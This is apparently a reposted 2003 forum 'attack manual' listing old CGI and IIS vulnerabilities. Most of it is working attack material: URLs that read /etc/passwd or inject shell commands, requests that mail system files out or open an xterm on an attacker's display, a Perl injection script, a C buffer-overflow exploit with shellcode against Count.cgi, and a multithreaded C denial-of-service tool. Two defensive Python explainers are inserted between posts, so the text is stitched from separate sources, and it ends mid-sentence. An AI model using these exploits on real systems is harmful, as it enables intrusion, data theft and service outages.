Network program vulnerability attack manual (repost)

Posted 2003-6-5 22:47:57
1. The phf hole
    This phf hole is probably the most classic one; almost every article covers it. It lets you run commands on the server, for example to display /etc/passwd:

    lynx http://www.victim.com/cgi-bin/ph ... n/cat%20/etc/passwd

    But can we still find one anywhere?

2. The hole in php.cgi 2.0beta10 and earlier
    Lets you read any file that user nobody can read.

    lynx http://www.victim.com/cgi-bin/php.cgi?/etc/passwd

    php.cgi 2.1 can only read shtml files. As for the password file, comrades should keep in mind that it may also be in /etc/master.passwd, /etc/security/passwd and so on.

3. whois_raw.cgi

    lynx http://www.victim.com/cgi-bin/wh ... 0Acat%20/etc/passwd
    lynx http://www.victim.com/cgi-bin/wh ... =%0A/usr/X11R6/bin/xterm%20-display%20graziella.lame.org:0

4. faxsurvey

    lynx http://www.victim.com/cgi-bin/faxsurvey?/bin/cat%20/etc/passwd

5. textcounter.pl
    If textcounter.pl is present on the server, anyone can execute commands with the privileges of the http daemon.

    #!/usr/bin/perl
    # textcounter.pl passes the requested URL through a shell, so a command
    # can be smuggled in after ';'. Spaces are written as ${IFS} and IFS is set
    # to '8' so the request itself contains no spaces.
    $URL='http://dtp.kappa.ro/a/test.shtml';    # please _DO_ _modify_ this
    $EMAIL='pdoru@pop3.kappa.ro,root';           # please _DO_ _modify_ this
    if ($ARGV[0]) {
        $CMD=$ARGV[0];
    } else {
        $CMD="(ps ax;cd ..;cd ..;cd ..;cd etc;cat hosts;set)\|mail ${EMAIL} -sanothere_one";
    }
    $text="${URL}/;IFS=\8;${CMD};echo|";
    $text =~ s/ /\$\{IFS\}/g;          # every space becomes ${IFS}
    #print "$text\n";
    system({"wget"} "wget", $text, "-O/dev/null");
    system({"wget"} "wget", $text, "-O/dev/null");
    #system({"lynx"} "lynx", $text); # lynx can be used instead if there is no wget
    #system({"lynx"} "lynx", $text);

6. A hole in some versions (1.1) of info2www
    $ REQUEST_METHOD=GET ./info2www '(../../../../../../../bin/mail jami     $
    You have new mail.
    $

    Honestly, I don't quite understand this one.

7. pfdispaly.cgi

    lynx -source \
    'http://www.victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'

    pfdisplay.cgi also has another hole that lets you execute commands
  
    lynx -dump http://www.victim.com/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
    or
    lynx -dump \
    http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'

8. wrap

    lynx http://www.victim.com/cgi-bin/wrap?/../../../../../etc

9. www-sql
    Lets you read some restricted pages. For example, when you enter http://your.server/protected/something.html in your browser
    you are asked for an account and password. With www-sql that is not needed:

    http://your.server/cgi-bin/www-sql/protected/something.html:

10. view-source

    lynx http://www.victim.com/cgi-bin/vi ... ../../../etc/passwd
     
11. campas

    lynx http://www.victim.com/cgi-bin/campas?%0acat%0a/etc/passwd%0a

12. webgais

    telnet www.victim.com 80
    POST /cgi-bin/webgais HTTP/1.0
    Content-length: 85 (replace this with the actual length of the "exploit" line)
    query=';mail+drazvan\@pop3.kappa.ro
13. websendmail

    telnet www.victim.com 80
    POST /cgi-bin/websendmail HTTP/1.0
    Content-length: xxx (should be replaced with the actual length of the string passed to the server, in this case xxx=90)
    receiver=;mail+your_address\@somewhere.org
14. handler

    telnet www.victim.com 80
    GET /cgi-bin/handler/useless_shit;cat	/etc/passwd|?data=Download HTTP/1.0
    or
    GET /cgi-bin/handler/blah;xwsh  -display        yourhost.com|?data=Download
    or
    GET /cgi-bin/handler/;xterm	-display	danish:0	-e	/bin/sh|?data=Download

    Note that the separator after cat is a TAB, not a space. The server will report that it cannot open useless_shit, but it still executes the command that follows.
   
15. test-cgi

    lynx http://www.victim.com/cgi-bin/test-cgi?\whatever
    CGI/1.0 test script report:

    argc is 0. argv is .

    SERVER_SOFTWARE = NCSA/1.4B
    SERVER_NAME = victim.com
    GATEWAY_INTERFACE = CGI/1.1
    SERVER_PROTOCOL = HTTP/1.0
    SERVER_PORT = 80
    REQUEST_METHOD = GET
    HTTP_ACCEPT = text/plain, application/x-html, application/html,
    text/html, text/x-html
    PATH_INFO =
    PATH_TRANSLATED =
    SCRIPT_NAME = /cgi-bin/test-cgi
    QUERY_STRING = whatever
    REMOTE_HOST = fifth.column.gov
    REMOTE_ADDR = 200.200.200.200
    REMOTE_USER =
    AUTH_TYPE =
    CONTENT_TYPE =
    CONTENT_LENGTH =
    This reveals some of the http server's directories.
   
    lynx http://www.victim.com/cgi-bin/te ... n/cat%20/etc/passwd
    This trick doesn't seem to work.
    lynx http://www.victim.com/cgi-bin/nph-test-cgi?/*
    You can also try it like this:
        GET /cgi-bin/test-cgi?* HTTP/1.0
        GET /cgi-bin/test-cgi?x *
        GET /cgi-bin/nph-test-cgi?* HTTP/1.0
        GET /cgi-bin/nph-test-cgi?x *
        GET /cgi-bin/test-cgi?x HTTP/1.0 *
        GET /cgi-bin/nph-test-cgi?x HTTP/1.0 *

   
16. On Apache on some BSDs you can:

    lynx http://www.victim.com/root/etc/passwd
    lynx http://www.victim.com/~root/etc/passwd
   
17. htmlscript

    lynx http://www.victim.com/cgi-bin/htmlscript?../../../../etc/passwd

18. jj.c

    The demo cgi program jj.c calls /bin/mail without filtering user
    input, so any program based on jj.c could potentially be exploited by
    simply adding a   followed by a Unix command. It may require a
    password, but two known passwords include HTTPdrocks and SDGROCKS. If
    you can retrieve a copy of the compiled program running strings on it
    will probably reveal the password.

    Do a web search on jj.c to get a copy and study the code yourself if
    you have more questions.

19. Frontpage extensions
    If you read http://www.victim.com/_vti_inf.html you get the version of the FP extensions
    and their path on the server. There are also some password files, such as:

    http://www.victim.com/_vti_pvt/service.pwd
    http://www.victim.com/_vti_pvt/users.pwd
    http://www.victim.com/_vti_pvt/authors.pwd
    http://www.victim.com/_vti_pvt/administrators.pwd

20. Freestats.com CGI
    I haven't come across this one, and since some details must not be gotten wrong I paste the English directly.

    John Carlton  found following.   He developed  an exploit  for the
    free web stats services offered at freestats.com, and supplied the
    webmaster with proper code to patch the bug.

    Start an  account with  freestats.com, and  log in.   Click on the
    area that  says "CLICK  HERE TO  EDIT YOUR  USER PROFILE & COUNTER
    INFO" This will  call up a  file called edit.pl  with your user  #
    and password included in it.  Save this file to your hard disk and
    open it  with notepad.   The only  form of  security in  this is a
    hidden  attribute  on  the  form  element  of your account number.
    Change this from

        *input type=hidden name=account value=your#*

    to

        *input type=text name=account value=""*

    Save your page and load it into your browser.  There will now be a
    text input box where the hidden element was before.  Simply type a
    # in and push the "click here to update user profile" and all  the
    information that appears  on your screen  has now been  written to
    that user profile.

    But that isn't the worst of it.  By using frames (2 frames, one to
    hold this page  you just made,  and one as  a target for  the form
    submission) you could change the password on all of their accounts
    with a simple JavaScript function.

    Deep inside the web site authors still have the good old "edit.pl"
    script. It takes some time to reach it (unlike the path described)
    but you can reach it directly at:

        http://www.sitetracker.com/cgi-bin/edit.pl?account=&password=

21. Vulnerability in Glimpse HTTP

    telnet target.machine.com 80
    GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5fyodor\@dhp.com\     HTTP/1.0
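Nearly everything in the post above (phf, whois_raw.cgi, faxsurvey, campas, webgais, handler, textcounter.pl) is the same bug seen through different CGIs: a request parameter is handed to /bin/sh, so a `%0a` (newline), `;` or `|` ends the command the author intended and whatever follows runs as the web server user, and the textcounter.pl exploit's `IFS` trick supplies word separators when spaces would be filtered. The Python below is an added example, not code from the post or from any of the programs it names; it reproduces the mechanism with `echo` standing in for the real lookup program, and shows the allowlisted, argv-based version that has no shell in the path.

```python
"""Shell metacharacter injection in a CGI-style handler, vulnerable vs. hardened.

Added example (not from the original post). `echo` stands in for the real
lookup program the classic CGIs invoked, so the demo is harmless to run.
"""
import re
import subprocess
from urllib.parse import unquote


def vulnerable_lookup(query: str) -> str:
    """phf-style: the decoded query is spliced into a command line for /bin/sh.
    A %0a, ';' or '|' inside `query` ends the intended command and starts
    another one, which runs with the server's privileges."""
    decoded = unquote(query)
    proc = subprocess.run("echo looking up " + decoded,
                          shell=True, capture_output=True, text=True)
    return proc.stdout


def hardened_lookup(query: str) -> str:
    """Allowlist the decoded value, then pass it as a single argv element.
    No shell ever parses it, so metacharacters keep no meaning even if the
    allowlist were later relaxed."""
    decoded = unquote(query)
    if not re.fullmatch(r"[A-Za-z0-9 ._-]{1,64}", decoded):
        raise ValueError("rejected lookup value: %r" % decoded)
    proc = subprocess.run(["/bin/echo", "looking up", decoded],
                          capture_output=True, text=True)
    return proc.stdout


def ifs_encode(command: str, sep: str = "8") -> str:
    """The textcounter.pl trick: set IFS to a harmless character and write every
    space as ${IFS}. The request then contains no space at all, but the shell
    still splits the expansion of ${IFS} into separate words."""
    return "IFS=%s;%s" % (sep, command.replace(" ", "${IFS}"))


if __name__ == "__main__":
    print(vulnerable_lookup("alice%0aecho INJECTED"), end="")
    print(vulnerable_lookup("alice;" + ifs_encode("echo via IFS")), end="")
    try:
        hardened_lookup("alice%0aecho INJECTED")
    except ValueError as err:
        print(err)
```

The second call shows why `IFS=8;echo${IFS}via${IFS}IFS` prints `via IFS`: only the result of the `${IFS}` expansion is subject to field splitting, and after the assignment the split character is `8`. The hardened version rejects the newline before anything is executed, and would still be safe without the regex because `/bin/echo` receives the value as one argument.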
OP | Posted 2003-6-5 22:48:57
22. Count.cgi
This program only works against Count.cgi versions below 24:

/*### count.c ########################################################*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <strings.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>

/* Forwards */
unsigned long getsp(int);
int usage(char *);
int openhost(char *, int);
void doit(char *, long, char *);

/* Constants */
char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\x04\x8d\x56\x31\x89\x56\x08\x8d\x56\x3a\x89\x56\x0c\x8d\x56\x10"
"\x89\x46\x10\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"/usr/X11R6/bin/xterm0-ut0-display0";
char endpad[]=
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff";


int main(int argc, char *argv[]) {
    char *shellcode = NULL;
    char *host = NULL;
    int cnt, ver, retcount, dispnum, dotquads[4], offset;
    unsigned long sp;
    char dispname[255];

    offset = sp = cnt = ver = 0;
    fprintf(stderr, "\t%s - Gus\n", argv[0]);
    if (argc < 3) usage(argv[0]);

    /* the posted getopt string lacked "o:", so the -o offset documented
       in usage() was silently ignored */
    while ((cnt = getopt(argc, argv, "h:d:v:o:")) != EOF) {
        switch (cnt) {
        case 'h':
            host = optarg;
            break;
        case 'd':
            retcount = sscanf(optarg, "%d.%d.%d.%d:%d",
                              &dotquads[0], &dotquads[1],
                              &dotquads[2], &dotquads[3], &dispnum);
            if (retcount != 5) usage(argv[0]);
            /* zero-padded dotted quad: the shellcode expects a fixed layout */
            sprintf(dispname, "%03d.%03d.%03d.%03d:%01d",
                    dotquads[0], dotquads[1], dotquads[2], dotquads[3], dispnum);
            /* sized from dispname (not optarg, which is shorter once padded)
               plus the terminating NUL */
            shellcode = malloc(strlen(shell) + strlen(dispname) + strlen(endpad) + 1);
            if (shellcode == NULL) {
                perror("malloc");
                exit(1);
            }
            sprintf(shellcode, "%s%s%s", shell, dispname, endpad);
            break;
        case 'v':
            ver = atoi(optarg);
            break;
        case 'o':
            offset = atoi(optarg);
            break;
        default:
            usage(argv[0]);
            break;
        }
    }

    if (host == NULL || shellcode == NULL) usage(argv[0]);

    sp = offset + getsp(ver);
    doit(host, sp, shellcode);
    free(shellcode);
    return 0;
}

unsigned long getsp(int ver) {
    /* Get the stack pointer we should be using. YMMV. If it does not work,
       try using -o X, where X is between -1500 and 1500 */
    unsigned long sp = 0;

    if (ver == 15) sp = 0xbfffea50;
    if (ver == 20) sp = 0xbfffea50;
    if (ver == 22) sp = 0xbfffeab4;
    if (ver == 23) sp = 0xbfffee38; /* Dunno about this one */
    if (sp == 0) {
        fprintf(stderr, "I don't have an sp for that version try using the -o option.\n");
        fprintf(stderr, "Versions above 24 are patched for this bug.\n");
        exit(1);
    }
    return sp;
}

int usage(char *name) {
    fprintf(stderr, "\tUsage: %s -h host -d display -v version [-o offset]\n", name);
    fprintf(stderr, "\te.g. %s -h www.foo.bar -d 127.0.0.1:0 -v 22\n", name);
    exit(1);
}

int openhost(char *host, int port) {
    int sock;
    struct hostent *he;
    struct sockaddr_in sa;

    he = gethostbyname(host);
    if (he == NULL) {
        fprintf(stderr, "Bad hostname\n");
        exit(-1);
    }

    memcpy(&sa.sin_addr, he->h_addr, he->h_length);
    sa.sin_port = htons(port);
    sa.sin_family = AF_INET;
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock < 0) {
        perror("cannot open socket");
        exit(-1);
    }
    bzero(&sa.sin_zero, sizeof(sa.sin_zero));

    if (connect(sock, (struct sockaddr *)&sa, sizeof sa) < 0) {
        perror("cannot connect to host");
        exit(-1);
    }

    return sock;
}

void doit(char *host, long sp, char *shellcode) {
    int cnt, sock;
    char qs[7000];
    char chain[] = "user=a";

    /* 4132 bytes of the guessed stack address, little-endian, so that
       wherever the saved return address lands it points into the sled
       (the posted code filled 4104 bytes in a loop and the next 7 words
       by hand; this is the same layout) */
    for (cnt = 0; cnt < 4132; cnt += 4) {
        qs[cnt + 0] = sp & 0x000000ff;
        qs[cnt + 1] = (sp & 0x0000ff00) >> 8;
        qs[cnt + 2] = (sp & 0x00ff0000) >> 16;
        qs[cnt + 3] = (sp & 0xff000000) >> 24;
    }
    /* the query string has to begin with a parameter Count.cgi accepts;
       the NUL that strcpy() leaves behind becomes a NOP */
    strcpy(qs, chain);
    qs[strlen(chain)] = 0x90;
    /* NOP sled + xterm shellcode + display name follow the addresses */
    strcpy(&qs[4132], shellcode);

    /* the same oversized string goes into both the query string and the
       User-Agent header */
    sock = openhost(host, 80);
    write(sock, "GET /cgi-bin/Count.cgi?", 23);
    write(sock, qs, strlen(qs));
    write(sock, " HTTP/1.0\n", 10);
    write(sock, "User-Agent: ", 12);
    write(sock, qs, strlen(qs));
    write(sock, "\n\n", 2);
    sleep(1);
    close(sock);

    /* printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0\nUser-Agent: %s\n\n",qs,qs); */

    /* for testing against a local copy of Count.cgi:
    setenv("HTTP_USER_AGENT",qs,1);
    setenv("QUERY_STRING",qs,1);
    system("./Count.cgi");
    */
}


Usage: count -h <target IP> -d <display> -v <version> [-o <offset>]
For example: count -h www.foo.bar -d 127.0.0.1:0 -v 22

  
Viewing images with Count.cgi
  
  http://attacked.host.com/cgi-bin ... ath_to_gif/file.gif


23. finger.cgi

    lynx http://www.victim.com/cgi-bin/finger?@localhost

    Gets the names of the users logged in on the host.
   
24. man.sh

    Robert Moniot found the following.  The May 1998 issue of SysAdmin
    Magazine  contains  an  article,  "Web-Enabled  Man  Pages", which
    includes source code for very nice cgi script named man.sh to feed
    man pages  to a  web browser.   The hypertext  links to  other man
    pages are an especially attractive feature.

    Unfortunately, this script is vulnerable to attack.   Essentially,
    anyone who can execute the cgi thru their web browser can run  any
    system commands with the user id of the web server and obtain  the
    output from them in a web page.

25. FormHandler.cgi
    Add the following to the form:

    and /etc/passwd will arrive in your mailbox.

26. JFS
    I'm sure everyone has read the article "The detailed process of JFS breaking into the PCWEEK-LINUX host". He used the photoads
    CGI module to get into the host. I haven't actually attacked with it; my understanding from the article is as follows:

    先lynx "http://securelinux.hackpcweek.com/photoads/cgi-bin/edit.cgi?
AdNum=31337&action=done&Country=lala&City=lele&State=a&EMail=lala@hjere.com&Name=%
0a11111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
11111111111111111111111111111111111111111111111111111111111&Phone=11&Subject=la&pa
ssword=0&CityStPhone=0&Renewed=0"

    After creating a new Ad value to bypass the $AdNum check, use

    lynx 'http://securelinux.hackpcweek.com/photoads/cgi-bin/photo.cgi?
file=a.jpg&AdNum=11111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111111111111111111111111111111
1111111111111111111111111111111111111111111111111111111&DataFile=1&Password=0&FILE
_CONTENT=%00%00%00%00%00%00%00%00%00%00%00%00%00&FILE_NAME=/lala/
\../../../../../../../home/httpd/html/photoads/cgi-bin/advisory.cgi%00.gif'

    This creates/overwrites any file that user nobody has permission to write.
    I'm not sure whether my understanding is right; I couldn't find the to_url script in its zip package. Does any comrade know?

27. Backdoors
    I see that some versions of cgichk.c now check for the trojans unlg1.1 and rwwwshell.pl.
    The former was written by UnlG and I have not seen its source; the other was written by THC, and packetstorm has the source of version 1.6.


28. shtml.dll
On FrontPage Extensions Server / Windows 2000 Server, requesting a file that does not exist gives you the local path of the web directory:
http://www.victim.com/_vti_bin/shtml.dll/something.html
This returns the following:
Cannot open "d:\inetpub\wwwroot\postinfo1.html": no such file or folder.
But if we request a file whose extension is not HTML, SHTML or ASP, we get a different message:
http://207.69.190.42/_vti_bin/shtml.dll/something.exe

shtml.dll recognizes and processes even very long file names that carry an html extension. Using this, a DoS attack can be run against an IIS server.
The following program drives the target server's CPU to 100% and uses up all of the application log space; within minutes
the system reports that the application log is full:

/* Windows only: Winsock 2 plus CRT threads; link against ws2_32.lib */
#include <winsock2.h>
#include <windows.h>
#include <process.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#pragma comment(lib, "ws2_32.lib")

void Dos(void *chara);

int main(int argc, char *argv[])
{
     WORD wVersionRequested;
     WSADATA wsaData;
     int err;
     long lDo;

     if (argc < 2)
     {
         printf("Usage: %s IP\n", argv[0]);
         return 1;
     }

     wVersionRequested = MAKEWORD(2, 2);

     err = WSAStartup(wVersionRequested, &wsaData);
     if (err != 0)
     {
        return 1;
     }

    if (LOBYTE(wsaData.wVersion) != 2 || HIBYTE(wsaData.wVersion) != 2)
    {
        WSACleanup();
        return 1;
    }

     printf("wait ...\n");
     /* 1000 concurrent connections, each requesting one oversized .html name */
     for (lDo = 0; lDo < 1000; lDo++)
     {
          _beginthread(Dos, 0, (void *)argv[1]);
     }
     Sleep(1000000L);
     WSACleanup();
     return 0;
}

void Dos(void *chara)
{
    long lLen;
    long lDo;
    char *ip;
    struct sockaddr_in serv_addr;
    SOCKET sockfd;
    char plusvuln[] = "GET /_vti_bin/shtml.dll/";
    char filler[] = "postinfdddddddddd";
    char tail[] = "tzl.html HTTP/1.0\n\n";

    ip = (char *)chara;

    serv_addr.sin_family = AF_INET;
    /* the posted code connected to a hard-coded 192.168.0.131 and ignored
       the IP given on the command line */
    serv_addr.sin_addr.s_addr = inet_addr(ip);
    serv_addr.sin_port = htons(80);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
    {
         printf("Create Socket failed\n");
         return;
    }

     if (connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
     {
         printf("Connect failed\n");
     }
     else
     {
         lLen = send(sockfd, plusvuln, (int)strlen(plusvuln), 0);
         /* 7000 x 17 bytes: a file name of about 119 KB ending in .html */
         for (lDo = 0; lDo < 7000; lDo++)
         {
              lLen = send(sockfd, filler, (int)strlen(filler), 0);
              if (lLen < 0)
              {
                  printf("Send failed\n");
                  closesocket(sockfd);
                  return;
              }
         }
         lLen = send(sockfd, tail, (int)strlen(tail), 0);
    }
    closesocket(sockfd);
}


29. ASP source code disclosure
http://somewhere/something.asp::$DATA
Fix: install SP3

http://somewhere/something.asp%2e
Fix: install SP4

http://somewhere/something.asp. (append a dot)
Fix: install SP4

http://somewhere/something%2e%41sp or
http://somewhere/something%2e%asp
Fix: install SP4

http://somewhere/something.asp%81
Fix: install SP6 or apply the patch


30. null.htw
If there are asp files under your web directory, e.g. http://www.xxx.com/asp/index.asp ... the source can be seen with:
http://www.xxx.com/null.htw?CiWe ... eCiHiliteType=Full

31. showcode.asp
http://www.someserver.com/msadc/ ... LECTOR/showcode.asp
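The shtml.dll, ASP source disclosure, null.htw and showcode.asp items above share one root cause: the server chose the script handler (or none) from the request path as written, and only afterwards let the file system resolve that path, so `.asp::$DATA`, `.asp.`, `%2e%41sp` or a trailing high byte still opened the .asp file but served it as static text. The Python below is an added example, neither IIS code nor the post's; it models the naive extension lookup next to a canonicalize-then-dispatch version that refuses, rather than guesses, whenever the path does not reduce to a plain ASCII name. The handler table and paths are constructed for the demo.

```python
"""Extension dispatch on a request path: the IIS-style mistake and the fix.

Added example, not from the original post and not IIS code. It models the bug
class behind the ::$DATA, trailing-dot, %2e%41sp and %81 source-disclosure
variants: deciding the handler from the raw path instead of the canonical one.
"""
from urllib.parse import unquote_to_bytes

# constructed handler table for the demo
HANDLERS = {".asp": "asp-engine", ".asa": "asp-engine", ".idc": "idc-engine"}


def naive_dispatch(raw_path: str) -> str:
    """Use the raw path's extension as written. Anything after the real
    extension (::$DATA, '.', %81) makes it unknown, so the static-file handler
    later serves the script's source once the file system has normalised
    the name."""
    ext = raw_path[raw_path.rfind("."):].lower() if "." in raw_path else ""
    return HANDLERS.get(ext, "static-file")


def canonical_path(raw_path: str) -> str:
    """Reduce a request path to the name the file system would actually open,
    or raise ValueError when that cannot be done safely:
      * percent-decode exactly once; a '%' left over means malformed or
        double-encoded input
      * control bytes (including %00) and bytes >= 0x80 are refused instead of
        being interpreted in some code page
      * ':' (NTFS alternate data streams such as ::$DATA) is refused
      * trailing dots and spaces are dropped, as Win32 does when opening a file
      * '..' segments are resolved and may not climb above the web root
    """
    decoded = unquote_to_bytes(raw_path)
    if b"%" in decoded:
        raise ValueError("malformed or double-encoded path")
    if any(b < 0x20 or b >= 0x80 for b in decoded):
        raise ValueError("control or non-ASCII byte in path")
    text = decoded.decode("ascii")
    if ":" in text:
        raise ValueError("NTFS stream syntax in path")
    parts = []
    for seg in text.replace("\\", "/").split("/"):
        if seg == "..":
            if not parts:
                raise ValueError("path escapes the web root")
            parts.pop()
            continue
        seg = seg.rstrip(". ")
        if seg:
            parts.append(seg)
    return "/" + "/".join(parts)


def safe_dispatch(raw_path: str) -> str:
    """Canonicalise first, then choose the handler from the canonical name."""
    try:
        path = canonical_path(raw_path)
    except ValueError:
        return "rejected"
    name = path.rsplit("/", 1)[-1]
    ext = name[name.rfind("."):].lower() if "." in name else ""
    return HANDLERS.get(ext, "static-file")


if __name__ == "__main__":
    for p in ["/something.asp", "/something.asp::$DATA", "/something.asp%2e",
              "/something.asp.", "/something%2e%41sp", "/something.asp%81"]:
        print("%-26s naive=%-12s safe=%s" % (p, naive_dispatch(p), safe_dispatch(p)))
```

Every variant from the ASP source disclosure list makes `naive_dispatch` fall through to the static-file handler, which is exactly the disclosure. After canonicalisation the trailing-dot and `%2e%41sp` forms dispatch to the ASP engine as intended, and the `::$DATA`, `%81`, `%00` and malformed `%as` forms are refused outright; that is the safer failure mode, since a handler that guesses is what produced the bug in the first place.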
OP | Posted 2003-6-5 22:50:07
32. SHTML.EXE
This hole is exploited by requesting, through shtml.exe of the FrontPage Server Extensions, a URL that
contains a DOS device name with a .htm extension.
http://www.example.com/_vti_bin/shtml.exe/com1.htm   
http://www.example.com/_vti_bin/shtml.exe/prn.htm   
http://www.example.com/_vti_bin/shtml.exe/aux.htm   
http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm   
http://www.example.com/_vti_bin/shtml.exe/com1.asp   
http://www.example.com/_vti_bin/shtml.exe/com1   
http://www.example.com/_vti_bin/shtml.exe/prn   
http://www.example.com/_vti_bin/shtml.exe/com1   
http://www.example.com/_vti_bin/shtml.exe/aux   
http://www.example.com/_vti_bin/shtml.exe/pipe.htm   
  

33. htimage.exe
htimage has three security problems:
1. It exposes the local disk path of the web root. As you saw above, the following reveals the disk path of the
target's web directory:
http://www.xxx.com/cgi-bin/htimage.exe/linux?0,0

CERN Image Map Dispatcher (/cgi-bin/htimage.exe) comes by default with FrontPage. I found three bugs
in "htimage.exe": 1) Gives us the full path to the root directory 2) Simple buffer overflow 3) Allow
us to access files.
2. Buffer overflow:
Tested on Windows 9x against servers running Microsoft-PWS-95/2.0 and FrontPage-PWS32.
http://www.xxx.com/cgi-bin/htimage.exe/<741 characters>?0,0.
The following error then appears on the target's console:


HTIMAGE caused an invalid page fault in
module  at 0000:41414141.
Registers:
0EAX=815c6240 CS=0137 EIP=41414141 EFLGS=00010246
EBX=0063fe28 SS=013f ESP=005400b4 EBP=005400d4
ECX=0054015c DS=013f ESI=005401a0 FS=3467
EDX=bff76648 ES=013f EDI=00540184 GS=0000
Bytes at CS:EIP:


Stack dump:
bff7663c 00540184 0063fe28 005401a0 0054015c 00540290 bff76648 0063fe28
0054016c bff85a0a 00540184 0063fe28 005401a0 0054015c 41414141 0054034c

The server keeps running and returns "500 Server Error".

3. Files can be accessed, but not read:
http://www.xxx.com/cgi-bin/htimage.exe/_vti_pvt/service.pwd?0,0
Output:
---------------------------------------------------------------------------
Error


Error calling HTImage:


HTImage.c: Syntax error at line 1 Bad field name, expecting 'default',
'rectangle', 'circle' or
'polygon' (got an alphanumeric string)
---------------------------------------------------------------------------


NOTE: Accessing "/_vti_pvt/service.pwd" outputs : 403 Forbidden


34. *.idc *.idq

Path disclosure:
On IIS 4.0 without Service Pack 5, entering this path in the browser:
http://www.xxx.com/*.idc
produces:

Error running query
Could not open query file e:\web\*.idc. The file may not exist or you may not have permission to open it.

This was fixed in SP5.
In IIS 5.0, however, the problem came back, for example on Microsoft's own site:

http://www.microsoft.com/vstudio/1.idq

produces:

The IDQ file d:\http\products\developer\devonly\prodinfo\vstudio\1.idq
could not be found.

Entering
http://www.microsoft.com/1.ida
produces:
The IDQ file d:\http\1.idq could not be found.


35. webhits.dll

IIS 4.0 has an application mapping htw -> webhits.dll, used for Index Server's hit highlighting. Even if you do not
run Index Server, the mapping remains in effect. This application mapping has a hole that lets an intruder read files on the
